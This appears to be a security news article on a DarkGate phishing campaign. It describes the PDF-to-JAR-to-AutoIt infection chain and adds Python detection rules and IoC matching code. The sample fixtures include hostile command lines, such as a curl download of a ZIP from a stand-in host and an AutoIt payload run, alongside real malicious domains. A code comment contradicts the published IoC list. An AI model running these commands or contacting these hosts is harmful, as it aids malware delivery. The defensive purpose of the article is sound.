Darkgate Malware Weaponizing XLSX, HTML, & PDF To Attack Windows Machines

by Esmeralda McKenzie

Attackers most frequently target XLSX, HTML, and PDF files because they are widely used and because these file formats are widely trusted.

This makes it easier to deliver them to recipients who may not be suspicious.

Forcepoint researchers recently reported that the Darkgate malware is distributed via phishing emails carrying malicious attachments such as XLSX, HTML, or PDF files, which take over accounts and replicate themselves.

It is persistent in the sense that it can go unnoticed while exposing victims to data loss, fraud, blackmail, and leaked sensitive data.

Technical Analysis

Forcepoint X-Labs analyzed a recent Darkgate campaign initiated via a phishing email containing a counterfeit Intuit QuickBooks invoice PDF.

It tricks users into clicking a link that purports to install Java but instead redirects them to a geofenced URL that silently downloads the next-stage malware payload.

Attack Chain (Source – Forcepoint)

Analysis of a malicious “may-document_[number].pdf” file shows an invoice PDF with a hyperlink embedded in a large XObject image.

Clicking the link downloads a malicious .jar file. The associated URLs share patterns with those used by QakBot actors previously, indicating possible connections.

Analyzing the malicious “.jar” file with JD-GUI uncovered a “.PNG” and an obfuscated “.class” file containing code that downloads a “.ZIP” file to C:\Downloads using a curl.exe command.

Once the ZIP is downloaded, it uses PowerShell’s Expand-Archive to extract the contents.

This class file can also download and install MSI files. Inside the ZIP, AutoIt3.exe and a compiled AutoIt script in .a3x format are extracted, which the JAR then runs via an obfuscated cmd command.

Darkgate has used AutoIt elsewhere, and this script was compiled with AutoIt 3.26+ and carries AU3!EA06 headers. Further investigation is needed to determine what this script does.

AutoIt’s BITXOR and BinaryToString() operations are hard to follow. The tool merges a large data stream into a local variable.

The DllStructCreate() library function allows bytes to be loaded into memory and then abuse system resources. The scripts build shellcode and connect to the botnet server remotely.

The Darkgate campaign deploys phishing emails posing as QuickBooks invoices to make users download malicious JAR files containing instructions for further payloads, such as obfuscated AutoIt scripts.

These scripts run shellcode and report to remote servers. The Darkgate campaign has skillfully blended legitimate malware techniques with previously seen URL patterns, demonstrating an advanced persistent threat (APT).
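The delivery chain described above (JAR spawning curl.exe to write into C:\Downloads, PowerShell Expand-Archive launched from Java, AutoIt3.exe executing an .a3x script, and the AU3!EA06 marker of a compiled AutoIt script) can be expressed as simple detection rules. The following is an added Python example, not Forcepoint's or the article's code: the process-record field names, the sample command lines and the placeholder domain stage2.example are assumptions constructed for illustration.

```python
import re
from dataclasses import dataclass

# Marker present in scripts compiled by AutoIt 3.26+, as named in the analysis.
AU3_MARKER = b"AU3!EA06"


@dataclass
class ProcEvent:
    """Minimal process-creation record (hypothetical field names)."""
    parent: str   # parent process image name
    image: str    # created process image name
    cmdline: str  # full command line


JAVA_IMAGES = {"java.exe", "javaw.exe"}


def _java_spawns_curl(e: ProcEvent) -> bool:
    # JAR loader invoking curl.exe to fetch the ZIP stage
    return e.parent.lower() in JAVA_IMAGES and e.image.lower() == "curl.exe"


def _curl_writes_to_c_downloads(e: ProcEvent) -> bool:
    # curl.exe writing under C:\Downloads, the drop directory named in the analysis
    return (e.image.lower() == "curl.exe"
            and re.search(r"c:\\downloads\\", e.cmdline, re.I) is not None)


def _expand_archive_from_java(e: ProcEvent) -> bool:
    # PowerShell Expand-Archive launched by the Java process
    return (e.parent.lower() in JAVA_IMAGES
            and e.image.lower() == "powershell.exe"
            and "expand-archive" in e.cmdline.lower())


def _autoit_runs_a3x(e: ProcEvent) -> bool:
    # AutoIt3.exe executing a compiled .a3x script
    return e.image.lower() == "autoit3.exe" and ".a3x" in e.cmdline.lower()


RULES = [
    ("java_spawns_curl", _java_spawns_curl),
    ("curl_writes_to_c_downloads", _curl_writes_to_c_downloads),
    ("expand_archive_from_java", _expand_archive_from_java),
    ("autoit_runs_a3x", _autoit_runs_a3x),
]


def evaluate(events):
    """Return (rule_name, event) pairs for every rule that fires, in event order."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((name, e))
    return hits


def is_compiled_autoit(data: bytes) -> bool:
    """True when the AU3!EA06 compiled-script marker appears in the buffer."""
    return AU3_MARKER in data


# Constructed sample events; stage2.example is a placeholder, not an IoC.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "javaw.exe", r'javaw.exe -jar "C:\Users\user\Downloads\invoice.jar"'),
    ProcEvent("javaw.exe", "curl.exe", r"curl.exe -o C:\Downloads\1.zip http://stage2.example/1.zip"),
    ProcEvent("javaw.exe", "powershell.exe",
              r"powershell.exe -c Expand-Archive C:\Downloads\1.zip -DestinationPath C:\Downloads"),
    ProcEvent("cmd.exe", "AutoIt3.exe", r"C:\Downloads\AutoIt3.exe C:\Downloads\payload.a3x"),
    ProcEvent("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\user\notes.txt"),  # benign control
]

if __name__ == "__main__":
    for name, e in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {e.image}: {e.cmdline}")
    print("compiled AutoIt sample:", is_compiled_autoit(b"\x00\x00AU3!EA06\x00"))
```

Each rule is deliberately narrow (parent/child pair plus a command-line token) so that a single legitimate curl.exe or Expand-Archive use does not fire; the value comes from several rules hitting on the same host within a short window.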

IOCs

Initial Stage URLs:

  • afarm[.]net/uvz2q
  • affixio[.]com/emh0c
  • affiliatebash[.]com/myu0f
  • afcmanager[.]net/jxk6m
  • adventsales[.]co[.]uk/iuw8a
  • amikamobile[.]com/ayu4d
  • adztrk[.]com/ixi7r
  • aerospaceavenue[.]com/cnz8g
  • amishwoods[.]com/jwa4v

Second stage URL:

  • smbeckwithlaw[.]com/1[.]zip

C2:

  • kindupdates[.]com
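To make the IoC list above usable for retro-hunting in proxy logs, here is an added Python example (not the article's or Forcepoint's code) that refangs the indicators, indexes them by host and path, and classifies constructed sample proxy lines by stage. The log line format and the sample lines are assumptions; the two entries listed with the garbled suffix "[.]accumulate" are read here as .net, which is also an assumption.

```python
from typing import Optional
from urllib.parse import urlsplit

# IoCs copied from the list above, defanged as published.
IOCS_DEFANGED = {
    "initial_stage": [
        "afarm[.]net/uvz2q",        # assumed .net (listed as "[.]accumulate")
        "affixio[.]com/emh0c",
        "affiliatebash[.]com/myu0f",
        "afcmanager[.]net/jxk6m",   # assumed .net (listed as "[.]accumulate")
        "adventsales[.]co[.]uk/iuw8a",
        "amikamobile[.]com/ayu4d",
        "adztrk[.]com/ixi7r",
        "aerospaceavenue[.]com/cnz8g",
        "amishwoods[.]com/jwa4v",
    ],
    "second_stage": ["smbeckwithlaw[.]com/1[.]zip"],
    "c2": ["kindupdates[.]com"],
}


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a matchable string."""
    return ioc.replace("[.]", ".")


def build_index(defanged=IOCS_DEFANGED):
    """Map (host, path-or-None) -> stage label. Host-only IoCs get path None."""
    index = {}
    for stage, entries in defanged.items():
        for entry in entries:
            host, _, path = refang(entry).partition("/")
            index[(host.lower(), "/" + path if path else None)] = stage
    return index


def classify_url(url: str, index) -> Optional[str]:
    """Return the stage label for a URL, or None when it matches no IoC."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    path = parts.path or "/"
    # Exact host+path first (stage URLs), then host-only (C2 domain, any path).
    for key in ((host, path), (host, None)):
        stage = index.get(key)
        if stage:
            return stage
    # Subdomains of a host-only IoC also count.
    for (ioc_host, ioc_path), stage in index.items():
        if ioc_path is None and host.endswith("." + ioc_host):
            return stage
    return None


def scan_proxy_log(lines, index):
    """Constructed format: '<timestamp> <client-ip> <method> <url> <status>'."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # skip malformed lines rather than crash the hunt
        ts, client, _method, url = fields[:4]
        stage = classify_url(url, index)
        if stage:
            hits.append((ts, client, stage, url))
    return hits


# Constructed sample proxy lines; timestamps and client IPs are made up.
SAMPLE_PROXY_LOG = [
    "2024-05-01T10:02:11Z 10.0.0.5 GET http://affixio.com/emh0c 302",
    "2024-05-01T10:02:13Z 10.0.0.5 GET https://smbeckwithlaw.com/1.zip 200",
    "2024-05-01T10:02:40Z 10.0.0.5 POST https://kindupdates.com/ 200",
    "2024-05-01T10:03:00Z 10.0.0.7 GET https://www.example.com/index.html 200",
]

if __name__ == "__main__":
    for ts, client, stage, url in scan_proxy_log(SAMPLE_PROXY_LOG, build_index()):
        print(f"{ts} {client} {stage}: {url}")
```

Stage URLs are matched on host and path because the published indicators are full paths, while the C2 entry is a bare domain and therefore matches any path and any subdomain; a single client hitting all three stages in sequence, as in the sample, is the pattern worth alerting on.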

Source credit : cybersecuritynews.com